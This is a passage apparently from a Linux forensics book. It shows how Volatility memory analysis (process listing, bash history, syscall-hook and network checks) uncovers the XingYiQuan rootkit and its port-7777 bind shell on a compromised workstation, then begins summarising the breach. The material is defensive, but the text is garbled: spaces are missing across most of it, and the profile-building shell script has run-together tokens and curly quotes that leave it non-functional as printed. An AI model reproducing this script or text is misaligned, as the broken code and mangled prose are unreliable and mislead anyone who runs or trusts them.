WewillonlycoverpartsofVolatilitythatapplytoLinuxsystems.WewillnotdelvetoodeeplyintosomeofthetheorybehindhowVolatilityworkseither.Ourfocusisonusingthetool.IfyouarerunningaDebian-basedLinux,Volatilitymightbeavailableinstandardrepositories, in which case it can be installed using sudo apt-get installvolatility volatility-profiles volatility-tools. If you need toinstall from source, download the latest version source archive fromhttp://volatilityfoundation.org, uncompress it, then install it by typing sudo./setup.pyinstallfromthemainVolatilitydirectory.

CREATINGAVOLATILITYPROFILEVolatilitymakes use of internal operating system structures. The structures can changefromoneversionofanoperatingsystemtothenext.Volatilityshipswithasetofprofilesfrom common versions ofWindows. The same is not true for Linux, however. Beforerushingtojudge,stoptothinkabouthowmanydifferentkernelversionsandvariantsofLinuxexistintheworld.

The solution forLinux systems is to create your ownprofile by compiling a specificprogram;creatingadwarffile;gettingasystemmapfile;andzippingeverythingtogether.Ifthissoundscomplicatedandcumbersome,itis.Neverfear,however,asIwillshowyouhowtocreatetheprofilefromyourmountedsubjectimageusingashellscript.Thisscript

shouldbeplacedinthesamedirectoryastheVolatilitymodule.candMakefile,whichcanbefoundinthetools/linuxdirectoryinsideofthevolatilityhierarchy.Thescriptfollows.#!/bin/bash

#

#create-profile.sh

#

#SimplescripttocreateamakefileforaVolatilityprofile.

#Intendedtobeusedwithanimagefile.

#AsdevelopedforPentesterAcademy

#byDr.PhilPolstra(@ppolstra)

usage(){

echo“ScripttocreateaVolatilityprofilefromamountedimagefile”

echo“Usage:$0<pathtoimageroot>”

exit1

}

if[$#-lt1];then

usage

fi

oldir=$(pwd)

cd${1}/boot

ver=$(lsSystem.map*|sed“s/System.map-//”|tr“\n”“|”\

|sed-nr‘s/([a-zA-Z0-9\.\-]+\|)*([a-zA-Z0-9\.\-]+\|)$/\2/p’\

|sed“s/|/\n/”)

cd“${oldir}”

echo“Version:${ver}”

PWD=$(pwd)

MAKE=$(whichmake)

cat<<EOF>Makefile.${ver}

obj-m+=module.o

-includeversion.mk

all:dwarf

dwarf:module.c

${MAKE}-C${1}/lib/modules/${ver}/build\

CONFIG_DEBUG_INFO=yM=”${PWD}”modules

dwarfdump-dimodule.ko>module.dwarf

${MAKE}-C${1}/lib/modules/${ver}/buildM=”${PWD}”clean

clean:

${MAKE}-C${1}/lib/modules/${ver}/buildM=”${PWD}”clean

rm-fmodule.dwarf

EOF

#makethedwarffile

make-fMakefile.${ver}

#copytheSystem.mapfile

cp${1}/boot/System.map-${ver}./.

#nowmakethezip

zipLinux${ver}.zipmodule.dwarfSystem.map-${ver}

Let’s walk through this script. It begins with the standard she-bang, usage, andcommand line parameter count check. The current directory is saved on the lineoldir=$(pwd), before changing to the subject’s /bootdirectory.Thenextpart of thescriptattemptstoguessthecorrectkernelversionbasedonthenameoftheSystem.mapfile.Thisiscomplicatedbythefactthattheremaybemorethanonekernelinstalled.

For thepurposesof thisscript,wewillassumethesubject is running the latestkernelversioninstalled.Thisisanotherreasonyoushouldrununame-aonthesubjectsystembefore shutting it down. What makes the line determining the kernel version socomplicatedisthepossibilityofhavingmorethanoneSystem.mapfile.Let’sbreakdownthever=…line.

ThefirstcommandislsSystem.map*whichcausesalloftheSystem.mapfilestobe output one per line. The next command,sed“s/System.map-//”, substitutes“System.map-”fornothingwhichessentiallystripsoff theprefixand leavesusawithalist of kernel versions, one per line. The third command, tr“\n” “|”, substitutes(translates)newlinecharacterstoverticalpipeswhichputsallversionsonthesameline.Thefourthcommandcontainsalongregularexpressionandasubstitutioncommand.

Ifyouexaminetheregularexpression,itconsistsoftwopieces.Thefirstpart,“([a-zA-Z0-9\.\-]+\|)*”,matcheszeroormoreletters,periods,numbers,anddashesthatprecedaverticalpipe.Whencombinedwiththesecondpart,whichisidenticalexceptforthefactthatthe“*”hasbecomea“$”,whichcausesthesecondparttomatchthelastitem(versionwith vertical pipe appended), the first part effectivelymatches all but the lastitem.Thesubstitutioncommand“/\2/”causes thesecondmatch(latestversion) tobesubstituted for the entire string. Finally, one last sed command is run to change theverticalpipebacktoanewline.

Oncetheversionhasbeendetermined,thescriptchangesbacktotheoriginaldirectorywiththelinethatreadscd“${oldir}”.Theversionisechoedtothescreen.Notethattheenvironmentvariableshavebeenenclosed incurlybracketsas this tends tobesaferthanusingbarevariables, i.e.$oldir,as thesearesometimesmisinterpreted.Thecurrentworking directory and full path to themake command are then saved in the PWD andMAKEenvironmentvariables,respectively.

Thelinecat<<EOF>Makefile.${ver}isslightlydifferentfromourprevioususeofcat<<EOF. Herewe have directed the output ofcat to a file instead of theterminaloranotherprogram.The lines that follow, through“EOF”,areused tocreateamakefile. For those not familiarwithmakefiles, they are used tomore efficiently buildsoftwarebyonlyrebuildingwhatisnecessary.Thegeneralformatforamakefileisaline

thatreads<target>:[dependencies]followedbyatabindentedlistofcommandstobuildthetarget.Theindentedlinesmustusetabsandnotspacesinorderforthemakeutilitytoproperlyinterpretthem.

Normallyamakefileisusedbysimplytypingmake[target]. Inorder tousethisform ofmake, a file namedMakefile must be present in the current directory. The -foption formake allows specificationof an alternatemakefile.This is preciselywhat isdoneinthisscript.Thelastlinesofthescriptrunmaketocreateadwarffile;copiestheSystem.map file from the subject system; and then creates a zip file that is used byVolatilityasaprofile.TheoutputfromthisscriptisshowninFigure8.1.

FIGURE8.1

UsingashellscripttocreateaVolatilityprofile.

Once the profile is built, copy it to the volatility/plugins/overlays/linux directory. Formy laptop, the full path is /usr/local/lib/python2.7/dist-packages/volatility-2.4-py2.7.egg/volatility/plugins/overlays/linux.As shown inFigure8.2, anyvalidzip file inthisdirectorybecomesavalidVolatilityLinuxprofile.Thecommandvol.py–inforunsVolatilityandlistsallavailableprofilesandotherinformation.Ifyoupipetheresultstogrep, like sovol.py–info|grepLinux, itwill give you a list ofLinuxprofiles(plusacoupleotherthings)asshowninthefigure.

FIGURE8.2

VolatilityLinuxprofiles.Thehighlightedlinesshowprofilesautomaticallyloadedbasedonthezipfilesinthisdirectory.

GETTINGPROCESSINFORMATIONThesyntax for runningacommand inVolatility isvol.py–profile=<profile>-f <image file> <command>, i.e. vol.py –profile=LinuxUbuntu-14_04-3_16_0-30x64 -f ~/cases/pfe1/ram.lime linux_pslist. Ifyouplanonusingscriptstolookatprocessinformation(oranythingforthatmatter)usingVolatility, you can store this obnoxiously long command,with profile and path to yourRAMimage,inavariable.

If youplanon runningmore thanonevolatility commandon the command line, youmightconsiderusingthealiasutilitytospareyourselfthepainofrepeatedlytypingallofthis(andlikelyfat-fingeringitatleastafewtimes).Thegeneralsyntaxforthealiascommand isaliasshortcut=”reallylongcommandthatyoudon’twanttotype”. Ifyouput thiscommandinyour .bashrcfile(locatedinyourhomedirectory)orotherstartupfile,itwillbeavailabletoyoueachtimeyoulogin.Ifyouwanttousethealiaswithoutloggingoutafterediting.bashrc,youmustsourcethe.bashrcfilebytyping.~/.bashrc.Theappropriatelinethathasbeenaddedtowardtheendofthe.bashrcfile(whichishighlighted)andthesourcingof.bashrcareshowninFigure8.3.

FIGURE8.3

CreatinganaliastomoreeasilyrunVolatility.Thehighlightedlineneartheendofthe.bashrcfilecreatestheappropriatealias.

AllofthesupportedLinuxcommandsbeginwith“linux_”.Typingvol.py–info|greplinux_ should produce a complete list of available Linux commands. PartialoutputfromrunningthiscommandisshowninFigure8.4.AsofVolatility2.4thereare66ofthesecommands.It isimportanttokeepinmindthatmemoryanalysisisasomewhatnewfield.Asaresult,itisnotuncommonforsomeoftheseVolatilitycommandstofail.

FIGURE8.4

SomeoftheavailableVolatilityLinuxcommands.

Volatility provides a number of process commands for Linux systems. One of thesimplestislinux_pslistwhichproducesalistoftasksbywalkingthetasklist.Thiscommand outputs the process name, process ID, user ID, and group ID (along with acoupleotherfieldsthatyoulikelydon’tneed).PartialoutputfromrunningthiscommandagainstourPFEsubjectsystemisshowninFigure8.5.ThehighlightedrowshowsashellassociatedwiththeXingYiQuanrootkitrunningwithrootprivilegesinprocess3027.

FIGURE8.5

Partialoutputof theVolatility linux_pslistcommand.Thehighlighted rowshowsa rootkit shell runningwithadministrativeprivileges.

Another command for listing processes islinux_psaux. This command is namedafterps-aux,whichisafavoritecommandforpeoplewhowanttogetalistingofallprocesses completewith command lines.Partial output from this command is shown inFigure 8.6. The highlighted lines show how a root shell was created with sudo -s(process 3034); which caused bash to run as root (process 3035); and then the LiMEmodulewasinstalled(process3073)inordertodumptheRAM.

FIGURE8.6

PartialoutputfromrunningtheVolatilitylinux_psauxcommandagainstthePFEsubjectsystem.

Thetwoprocesscommandspresentedthusfaronlyshowtheprocessesinisolation.Toget information on the relationship of processes to each other, the linux_pstreecommandcanbeused.Thiscommandwillshowprocesseswithanysubprocesses listedunderneath and preceded by a period. Nested processes will have multiple periodsprepended to their names. Not surprisingly, almost everything is a subprocess of init,whichhasaprocess IDof1as it is the first thingexecutedatboot time.Partialoutputfromrunningthiscommandagainst thePFEsubjectsystemisshowninFigure8.7.ThehighlightedportionclearlyshowsthecreationoftherootshellbytheuserwithID1000whichwasthenusedtodumptheRAMwithLiME.

FIGURE8.7

Partial results from running the Volatility linux_pstree command against the PFE subject system. ThehighlightedoutputshowstherelationshipsofprocesseshighlightedinFigure8.6.

Whilethelinux_psauxcommandisniceandprovidesalotofinformation,thereisanother command that can provide even more information. That command islinux_psenv. This command lists the full process environment for every displayedprocess.Becausethiscommandwillgeneratealotofoutput,youmaywishtousethe-poption,whichallowsyoutoprovideacommadelimitedsetofprocessidentitynumbers.Forhelponthis,oranyotherVolatilitycommand,runvol.py<command>-hforabriefhelpscreen.Thelastpartofthishelpscreenforlinux_psenvaswellastheresultsofrunninglinux_psenvontheprocessassociatedwiththerootkitareshowninFigure8.8.

FIGURE8.8

Partial results of running vol.py linux_psenv -h and results of running this command on the processassociatedwitharootkit.

The-poptionfromthehelpscreenishighlightedinFigure8.8.LookingatthebottomofthefigureweseethatthisprocesswasexecutedbythejohnuserwithuserID1000,andthat sudo was used. This does not necessarily mean that John was involved in thecompromise.Rather,thistellsusthathisaccountwasused.Thereareanumberofreasonsthathisaccountmayhavebeenused.Hemighthavebeentargetedbysomeonethatknewhehadadministrativeprivileges.Itisalsoquitepossiblethathehasaweakpasswordthattheattackerwasabletocrack.

Volatilityprovidesacross-referencecommandforprocessescalledlinux_psxview.Whywouldyouwantsuchacommand?Somemalwarewillattempttohideitsprocessesfrom view by altering internal kernel structures. By comparing (cross-referencing) thevarious structures, inconsistencies related tomalware aremore easily identified. PartialresultsofrunningthiscommandagainstthePFEsubjectsystemareshowninFigure8.9.Inthiscasenothingunusualwasnoted.

FIGURE8.9

Partialresultsfromrunninglinux_psxviewagainstthePFEsubjectsystem.

PROCESSMAPSANDDUMPSIn the previous section we saw how Volatility can be used to get lists of processesincludingdetailedinformationoneachprocess.InthissectionwewillexaminehowtouseVolatility to determine how processes are laid out (mapped) in memory. The firstcommandwewilldiscussislinux_proc_maps.TheresultsofrunningthiscommandagainsttherootkitprocessonthePFEsubjectsystemareshowninFigure8.10.

FIGURE8.10

Gettingaprocessmapfortherootkitprocess.

The linux_proc_maps command displays memory segments used by a process.Noticethateachsegmenthasflags(permissions)associatedwithit.WhatyouwillnotseeonLinux(intheoryatleast)isasegmentthatisbothwritableandexecutableasthiswouldopen thedoor foranattacker to rewritecode inaprocessand then runmaliciouscode.Noticethatifafileisassociatedwithachunkofmemory,itsinodeandfilepatharealsodisplayed. Inotherwords, the filesystemanalysisperformed inpreviouschapters is stillapplicablewhenanalyzingmemory.

Therootkitappearstobeloadedatthestandardplaceof0x400000.Ithasacoupleofadditionalsegments,oneofwhichisreadonly.Thereisalsoaheapassociatedwiththisprogram.Acoupleofsharedlibraries,whichalsohavesomeextramemorysegments(forstoringtheirvariables),areloadedhigherupinmemory.Theprogramstack(whichgrowsdownward)isalsointhehighermemorylocations.Thereisanalternativecommandtogetthis information, linux_proc_maps_rb. This command uses the balanced treestructuresused tomapmemoryas the sourceof itsdata.These treesarealsoknownasred-blacktrees,whichisthereasonforthe_rbsuffix.

ThefactthattheClibraryisloadedsuggeststhatthisrootkitwaswritteninCorC++.This can’t be provenwithout analyzing the code, however, as it is possible to load thislibraryeveniftherootkitwaswritteninanotherlanguagesuchasAssembly.Howcantherootkitbeexamined?TheVolatilitylinux_procdumpcommandcanbeusedtodumpaprocessesmemorytoafile.Wewilldiscusswhattodowithsuchafilelaterinthisbookwhenwediscussmalwareanalysis.

Thelinux_procdumpcommandacceptsanoptionalprocessIDlistandrequiresan

outputdirectorywhichisspecifiedwiththe-D(or–directory=)option.Figure8.11showstheresultsfromrunninglinux_procdumponourrootkitprocessandprintingoutthefirstpartoftheresultingdump.WecanseethatthisisanExecutableLinkableFile(ELF)thathasbeenloadedintomemoryfromthefirstfourbytesinthedump.

FIGURE8.11

ResultsofrunningtheVolatility linux_procdumpcommandontherootkit fromthePFEsubjectsystem.ThefirstfourbytesofthedumpindicatethisisanexecutableinELFformat.

GETTINGBASHHISTORIESEarlierinthisbookwediscussedhowtogetusers’bashhistoriesfromtheirhistoryfiles.We can also get the bash history information from the bash processmemory itself.Asdiscussedpreviously,asophisticatedattackermightdeletethehistoryfilesand/orsetthehistory size to zero. The history size is determined by the HISTSIZE environmentvariable, which is normally set in the .bashrc file (default value is 1000). Even if thehistoryisnotbeingsavedtodisk,itisstillpresentinmemory.

The Volatility command for retrieving bash histories from bash process memory islinux_bash.PartialresultsfromrunningthiscommandagainstthePFEsubjectsystem,with suspicious activity highlighted, are shown in Figure 8.12 and Figure 8.13. Manyotheractionsbytheattackerwerefoundthatarenotdisplayedinthefigures.

FIGURE8.12

Partialresultsfromrunninglinux_bashagainstthePFEsubjectsystem.Thehighlightedportionshowswhereanattackerattemptedtomodifythe/etc/passwordfileaftermovingthebogusjohnnuser’shomedirectory.

FIGURE8.13

Partialresultsfromrunninglinux_bashagainstthePFEsubjectsystem.Thehighlightedportionshowswhereanattackermovedahomedirectoryforanewlycreateduserandsetpasswordsforsystemaccounts.

Just as we have a command for retrieving the environment for any process,

linux_psenv, there is a Volatility command that returns the environment for anyrunning bash shell. This command is called linux_bash_env. Partial results fromrunningthiscommandareshowninFigure8.14.FromtheUSERvariableineachofthebashshellsshowninthefigure,wecanseethatoneshellisrunbythejohnuserandtheotherisrunbyroot.Itislikelythatthejohnuserstartedthesecondshellwithsudo-s.

FIGURE8.14

PartialoutputfromrunningtheVolatilitylinux_bash_envcommandagainstthePFEsubjectsystem.

Whenacommandisrunforthefirsttimeinabashshell,bashmustsearchthroughtheuser’spath(storedinthePATHenvironmentvariable).Becausethisisatimeconsumingprocess,bashstoresfrequentlyruncommandsinahashtabletoalleviatetheneedtofindprogramseachtime.Thishashtablecanbeviewed,modified,andevenclearedusingthehashcommand.Volatilityprovidesthecommandlinux_bash_hashforviewingthisbash hash table for each bash shell in memory. The results of running this commandagainstthePFEsubjectsystemareshowninFigure8.15.

FIGURE8.15

ResultsfromrunningtheVolatilitylinux_bash_hashcommandagainstthePFEsubjectsystem.

VOLATILITYCHECKCOMMANDSVolatilitycontainsseveralcommandsthatperformchecksforvariousformsofmalware.Many of these commands are of the form linux_check_xxxx. In general, Volatilitycommands can take a long time to run, and these check commands seem to take thelongesttime.Howlongisalongtime?Figure8.16showsascreenshotfromanattempttorun the linux_apihooks command, which is used to detect userland API hooks,against thePFEsubject system.After threehoursofprocessing the small (2GB)RAMimageonmyi7laptopwith8GBofmemory,thecommandstillhadn’tcompleted.

FIGURE8.16

AverylongrunningVolatilitycommand.Thecommandwasabortedafterithadnotcompletedinnearlythreehours.

Ifyoususpect that thefunctionpointers fornetworkprotocolsonasystemhavebeenmodified,thelinux_check_afinfocommandwillcheckthesefunctionpointersfortampering.Thiscommandreturnedno resultswhenrunagainst thePFEsubject system.The linux_check_creds command is used to detect processes that are sharingcredentials.Those familiarwithWindowsmayhaveheardofpass-the-hashorpass-the-tokenattacks, inwhichanattackerborrowscredentials fromoneprocess to runanotherprocesswithelevatedprivileges.This commandchecks for theLinuxequivalentof thisattack.RunningthiscommandagainstthePFEsubjectsystemalsoproducednoresults.

Thelinux_check_fopcommandcanbeusedtocheckfileoperationstructuresthatmayhavebeenalteredbya rootkit.Onceagain, running thiscommandagainst thePFEsubject system produced no results. This is not surprising. The rootkit installed on thissystem hides itself with a method that doesn’t involve altering the file operationcommands(rather,thedirectoryinformationismodified).

Many readers are likely familiar with interrupts. These are functions that are calledbased on hardware and software events. The function that is called when a particularinterrupt fires is determined by entries in the Interrupt Descriptor Table (IDT). TheVolatilitycommandlinux_check_idtallowstheIDTtobedisplayed.Theresultsofrunning thiscommandagainst thePFEsubjectsystemareshowninFigure8.17.Noticehowalloftheaddressesareclosetoeachother.Asignificantlydifferentaddressinanyoftheseslotswouldbesuspicious.

FIGURE8.17

ResultsfromrunningtheVolatilitylinux_check_idtcommandagainstthePFEsubjectsystem.

The kernel mode counterpart to the linux_apihooks command islinux_check_inline_kernel. This command checks for inline kernel hooks. Inotherwords, thisverifies thatkernelfunctioncallsaren’tbeingredirectedtosomewhereelse.RunningthiscommandagainstthePFEsubjectsystemproducednoresults.

Volatility provides the linux_check_modules function which will compare themodulelist(storedin/proc/modules)againstthemodulesfoundin/sys/module.Rootkitsmight be able to hide by altering thelsmod commandor other internal structures, buttheyalwaysmustexistsomewhereinakernelstructure.ThiscommandalsoproducednoresultswhenrunagainstthePFEsubjectsystem.

WhileWindowsusesanAPI,Linuxcomputersutilizesystemcallsformostoperatingsystemfunctions.Likeinterrupts,systemcallsarestoredinatableandarereferencedbynumber. The mapping of numbers to functions is stored in system headers. Thelinux_check_syscallcommandwillcheckthesystemcall tableforalterations. Ifsomething has been changed, “HOOKED” is displayed after the index and the address.Otherwise,thenormalfunctionnameisdisplayed.On64-bitsystemstherearetwosystemcall tables. One table is for 64-bit calls and the other for 32-bit calls. Running thiscommand against the PFE subject system revealed that the 64-bit open, lstat, dup, kill,getdents,chdir,rename,rmdir,andunlinkatsystemcallshadallbeenhookedbytheXingYiQuanrootkit.

Volatilityprovidestwocommandsfordetectingkeylogging:linux_check_ttyandlinux_keyboard_notifiers. Each of these checks for well-documented keyloggingtechniques.Thefirstchecksforinterceptionattheterminaldevicelevel,andthe

second verifies that all processes on the keyboard notifier list are in the kernel addressspace (user address space indicates malware). If a problem is detected, the word“HOOKED”isdisplayed.TheresultsofrunningthesetwocommandsareshowninFigure8.18.NokeyloggerwasdetectedonthePFEsubjectsystem.

FIGURE8.18

RunningVolatilitykeyloggingdetectioncommandsagainstthePFEsubjectsystem.

GETTINGNETWORKINGINFORMATIONMany types of malware will attempt to exfiltrate data and/or use some form ofinterprocess communication (IPC). These activities usually involve some sort ofnetworking.Volatilityallowsyoutogetvarioustypesofnetworkinginformation,inordertohelpyoulocatemalware.

The Linuxifconfig command is used to list network interfaces along with theirMACandIPaddresses,etc.TheVolatilitylinux_ifconfigcommandwillprovidealistofnetworkinterfaceswithIPaddress,MACaddress,andwhetherornotpromiscuousmodeisenabled.Asareminder,packetsreceivedonaninterface thatareforadifferentinterfacearenormallydropped.Aninterfaceinpromiscuousmodemaybeusedforpacketsniffingasnopacketsaredropped.TheresultsofrunningthiscommandagainstthePFEsubjectsystemareshowninFigure8.19.Nothingunusualisseenhere.

FIGURE8.19

ResultsofrunningtheVolatilitylinux_ifconfigcommandagainstthePFEsubjectsystem.

Once thenetwork interfacesareknown,you should lookatopenportson the subjectmachine.OnLinuxsystemsthenetstatcommandisoneofmanytoolsthatwillreportthis type of information. The Volatility linux_netstat command provides similarinformation.Readers are likely familiarwith TCP andUDP sockets. Somemay not befamiliar withUNIX sockets, which are also reported bynetstat. AUNIX socket isusedforinterprocesscommunicationonthesamemachine.IfyoulookatatypicalLinuxsystem itwill have a lot of these sockets in use.Don’t overlook these sockets in yourinvestigation,astheycouldbeusedforIPCbetweenmalwarecomponentsorasawaytointeractwithlegitimatesystemprocesses.

Becausethelinux_netstatcommandreturnssomuchinformation,youmightwantto combine it with grep to separate the various socket types. Results from running thelinux_netstatcommandwith theresultspiped togrepTCPareshowninFigure8.20.Thehighlightedlineshowsarootkitshellislisteningonport7777.WecanalsoseeSecure Shell (SSH) and File Transfer Protocol (FTP) servers running on thismachine.There are dangers associatedwith running an FTP server.One of these is the fact thatlogins are unencrypted, which allows for credentials to be easily intercepted. Onlinepasswordcrackingagainst theFTPserverisalsomuchquickerthanrunningapasswordcrackeragainstSSH.ThisFTPservercouldhaveeasilybeenthesourceofthisbreach.

FIGURE8.20

TCPsocketsonthePFEsubjectsystem.

Theresultsfromrunninglinux_netstatagainstthePFEsubjectsystemandpipingthemtogrepUDPareshowninFigure8.21.PartialresultsofrunningthiscommandandpipingoutputtogrepUNIXareshowninFigure8.22.Notsurprisingly,alargenumberof UNIX sockets are being used by operating system and X-Windows components.Nothingoutoftheordinaryisseenhere.

FIGURE8.21

UDPsocketsonthePFEsubjectsystem.

FIGURE8.22

PartiallistingofUNIXsocketsonthePFEsubjectsystem.

Linux provides an extensive system, known as netfilter, for filtering out variousnetworkingpackets.Netfilterallowsasetofhookstobecreatedatvariouspointsinthenetworkflow,suchaspre-routing,post-routing,etc.Acompletediscussionofnetfilteriswellbeyond thescopeof thisbook.TheVolatilitylinux_netfiltercommandwilllistnetfilterhooksthatarepresent.RunningthiscommandagainstthePFEsubjectsystemrevealed a pre-routing hook with an address similar to that of the system call hookscreatedbytheXingYiQuanrootkit.

TheAddressResolutionProtocol(ARP)isusedtotranslateMAC(hardware)addressesto IP addresses. Some attacks work by altering the ARP table and/or by abusing ARPprotocols. Volatility provides thelinux_arp command for printing ARP tables. TheresultsofrunningthiscommandagainstthePFEsubjectsystemareshowninFigure8.23.Thereappearstobenothingamisshere.

FIGURE8.23

TheARPTablefromthePFEsubjectsystem.

Sockets operating in promiscuous mode can be listed with the Volatilitylinux_list_raw command.Running this command against the PFE subject systemonlyshowedthetwoDynamicHostConfigurationProtocol(DHCP)clients.Therearetwobecause each network interface using DHCP has its own process. In other words, thisrevealednothingabnormal.

GETTINGFILESYSTEMINFORMATIONTheprevious,quite lengthy,chapterdealtwith filesystems.Youmightwonderwhyyouwoulduseamemoryanalysistooltoinspectfilesystems.Thereareacoupleofreasonsfordoing this. First of all, knowing what filesystems have been mounted can be helpful.Secondly,manymodernLinuxsystemsmakeuseoftemporaryfilesystemsthatgoawaywhenthesystemisshutdown.AtoollikeVolatilitymaybetheonlywaytorecoverthesetemporaryfilesystems.

TheVolatilitylinux_mount command lists allmounted filesystems completewithmountoptions.Theresultsfromthiscommandallowyoutodetectextrathingsthathavebeenmounted, and also filesystems that have been remounted by an attackerwith newoptions. Partial results from running this command against the PFE subject system areshown in Figure 8.24. The FAT (/dev/sdb1) and ext4 (/dev/sdb2) partitions from myresponsedriveusedtoloadLiMEcanbeseeninthefigure.

FIGURE8.24

PartialresultsfromrunningtheVolatilitylinux_mountcommandagainstthePFEsubjectsystem.

Not surprisingly, Linux caches recently accessed files. The Volatilitylinux_enumerate_filescommandallowsyoutogetalistofthefilesinthecache.This can help youmore easily locate interesting fileswhen performing your filesystemanalysis.AscanbeseenfromFigure8.25,thejohnuserhasalotoffilesassociatedwiththerootkitinhisDownloadsfolder.Thiscommandproducesalotofoutput.Tohomeinon particular directories, youmightwant to pipe the results toegrep‘^<pathofinterest>’, i.e.egrep‘^/tmp/’.The “^” in the regular expression anchors thesearch pattern to the start of the line which should eliminate the problem of otherdirectories and files that contain the search string appearing in your results. Note thategrep(extendedgrep)mustbeusedfortheanchortoworkproperly.Partialresultsfrompipingthecommandoutput toegrep‘^/tmp/’areshowninFigure8.26.Notice thereareseveral filesassociatedwith the rootkithere, including#657112,#657110,and#657075whichareinodenumbersassociatedwiththerootkitfiles.

FIGURE8.25

Rootkitfilesinthefilesystemcache.

FIGURE8.26

PartialresultsofrunningtheVolatility linux_enumerate_filescommandagainst thePFEsubjectsystemandpipingtheoutputtoegrep‘^/tmp/’.

Oncefilesinthecachehavebeendiscoveredusinglinux_enumerate_files,theVolatilitylinux_find_filecommandcanbeusedtoprintouttheinodeinformation.

This command can alsobeused to extract the file.Toget the inode information the -F<full path to file> optionmust be used.Unfortunately, the -F option doesn’t appear tosupportwildcards.Once the inode number and address is found,linux_find_filecanbererunwiththe-i<addressofinode>-O<outputfile>options.Thefullprocessofrecovering the /tmp/xingyi_bindshell_port file is shown inFigure8.27.From the figurewecanseethatthisfilestoresthevalue7777,whichcorrespondstoourearlierdiscoveryinthenetworkingsectionofthischapter.

FIGURE8.27

RecoveringafilewithVolatility.

MISCELLANEOUSVOLATILITYCOMMANDSAs we said at the beginning of this chapter, we have not covered every one of the

VolatilitycommandsforLinuxsystems.Thereareacoupleofreasonsforthis.First, theavailable commands are not equally useful. Some might only be occasionally helpful.Second,Ihavefoundthatlaterkernelsarenotwell-supportedbyVolatility.Someofthecommandswillfailspectacularly,whileotherswillproduceanunsupportederrormessageandexitgracefully.Forcompleteness,IhavelistedadditionalLinuxcommandsinTable8.1.

Table8.1AdditionalVolatilitycommandsnotdiscussedinthischapter.

Command Description Notes

linux_banner PrintsLinuxbannerinformation Similartouname-acommand

linux_check_evt_arm CheckExceptionVectorTable ARMarchitectureonly

linux_check_syscall_arm Checksystemcalltable ARMarchitectureonly

linux_cpuinfo PrintCPUinfo GivesCPUmodelonly

linux_dentry_cache Usedentrycachetomaketimeline Likelyfailswithrecentkernels

linux_dmesg Printdmesgbuffer Sameascat/var/log/dmesg

linux_dump_map Writesmemorymapstodisk Goodformalwareanalysis

linux_elfs PrintELFbinariesfromprocessmaps Lotsofoutput(toomuch?)

linux_hidden_modules Carvesmemoryforkernelmodules FoundXingYiQuanrootkit

linux_info_regs PrintCPUregisterinfo Failsfor64-bitLinux

linux_iomem Similartorunningcat/proc/iomem Displaysinput/outputmemory

linux_kernel_opened_files Listsfilesopenedbykernel

linux_ldrmodules Compareprocmapstolibdl Lotsofoutput

linux_library_list Listslibraryusedbyaprocess Usefulformalwareanalysis

linux_library_dump Dumpssharedlibrariestodisk Use-ptogetlibsforaprocess

linux_lsmod Printloadedmodules Similartolsmodcommand

linux_lsof Listsopenfiles Similartolsofcommand

linux_malfind Lookforsuspiciousprocessmaps

linux_memmap Dumpthememorymapforatask Usefulformalwareanalysis

linux_moddump Dumpkernelmodules Usefulformalwareanalysis

linux_mount_cache Printmountedfilesystemsfromkmem_cache Likelyfailsforrecentkernels

linux_pidhashtable EnumeratesprocessesbasedonthePIDhashtable

linux_pkt_queues Dumpper-processpacketqueues Likelyfailsforrecentkernels

linux_plthook ScanELFProceedureLinkageTable Usefulformalwareanalysis

linux_process_hollow Checkforprocesshollowingwhichistechniqueforhidingmalwareinsidealegitimateprocess

Candiscovermalware.Requiresbaseaddresstobespecified.

linux_pslist_cache Listsprocessesusingkmem_cache Likelyfailsforrecentkernels

linux_recover_filesystem Recoverstheentirecachedfilesystem Likelyfailsforrecentkernels

linux_route_cache Recoversroutingcachefrommemory(removedinkernel3.6)

Likelyfailsforrecentkernels

linux_sk_buff_cache Recoverspacketsfromkmem_cache Likelyfailsforrecentkernels

linux_slabinfo Printsinfofrom/proc/slabinfo Likelyfailsforrecentkernels

linux_strings Searchesforlistofstringsstoredinafile Takesalongtimetorun

linux_threads Printsthreadsassociatedwithprocesses Usefulformalwareanalysis

linux_tmpfs Recovertmpfsfrommemory Likelyfailsforrecentkernels

linux_truecrypt_passphrase RecoverTruecryptpassphrases

linux_vma_cache RecoverVirtualMemoryAreas Likelyfailsforrecentkernels

linux_volshell PythonshellwhichallowsVolatilityscriptstoberuninteractively

UnlessyouknowadecentamountofPython,youwilllikelyneverusethis.

linux_yarascan UseYARArulestolocatemalware Usefulformalwareidentification

AsyoucanseefromTable8.1,manyoftheVolatilitycommandsforLinuxdon’tworkwith recent kernels. The remaining commands are predominantly used for malwareanalysis.Youmight see some of them inChapter 10wherewe delve a bit deeper intomalware.

SUMMARYIn this chapter we have introduced the most commonly used Volatility commands forincidentresponseonaLinuxsystem.Wesawthatmanyofthesecommandsreturnednoadditional information about the attack onPFE’s computer. In the next chapterwewilldiscusshowthissituationchangeswhentheattackerusessomemoreadvancedtechniquesthanthoseemployedinthePFEhack.

CHAPTER

9DealingWithMoreAdvancedAttackersINFORMATIONINTHISCHAPTER:

SummaryofanunsophisticatedattackLiveresponseMemoryanalysisofadvancedattacksFilesystemanalysisofadvancedattacksLeveragingMySQLReportingtotheclient

SUMMARYOFTHEPFEATTACKUptothispointinthebook,wehavediscussedarathersimpleattackagainstadeveloperworkstationatPFE.Afterfinishingyourinvestigationyoudeterminedthatthebreachwascausedby the johnuserhavingaweakpassword. It seems that inearlyMarch2015anattacker realized that the subject systemhad a johnuserwith administrative access andwasconnectedtotheInternetwhileexposingSSHandFTPservers.

It isdifficult tosayexactlyhowtheattackercame tohave thisknowledge.HeorshemighthavedonesomeresearchonthecompanyandmadesomereasonableguessesaboutMr.Smith’susernameandlikelylevelofaccessonhisworkstation.Theattackerdoesn’tappeartohavesniffedJohn’susernamedirectlyfromtheFTPserver,astherewouldhavebeennoneed tocrack thepassword if thiswere thecase, since the login information issentunencrypted.

You can tell that the username was known, but the password was not, because theattackerusedHydra,orasimilaronlinepasswordcracker,torepeatedlyattempttologinasthe johnuseruntilheor shewassuccessful.The fact that successcamequickly for theattackerwasprimarily the resultofMr.Smithchoosingapassword in the top50worstpasswords.Thelogsrevealthatnootherusernameswereusedintheattack.

Once logged in as John, the attacker used his administrative privileges to setup thebogus johnn account, modify a couple of system accounts to permit them to log in,overwrite/bin/falsewith/bin/bash,andinstalltheXingYiQuanrootkit.Wehaveseenthatattackerstruggleandresorttoconsultingmanpages,andotherdocumentation,alongtheway.HadMr.Smithbeenforcedtoselectamoresecurepassword,thisbreachmayneverhaveoccurred,giventheattacker’sapparentlylowskilllevel.Whatdoesincidentresponse

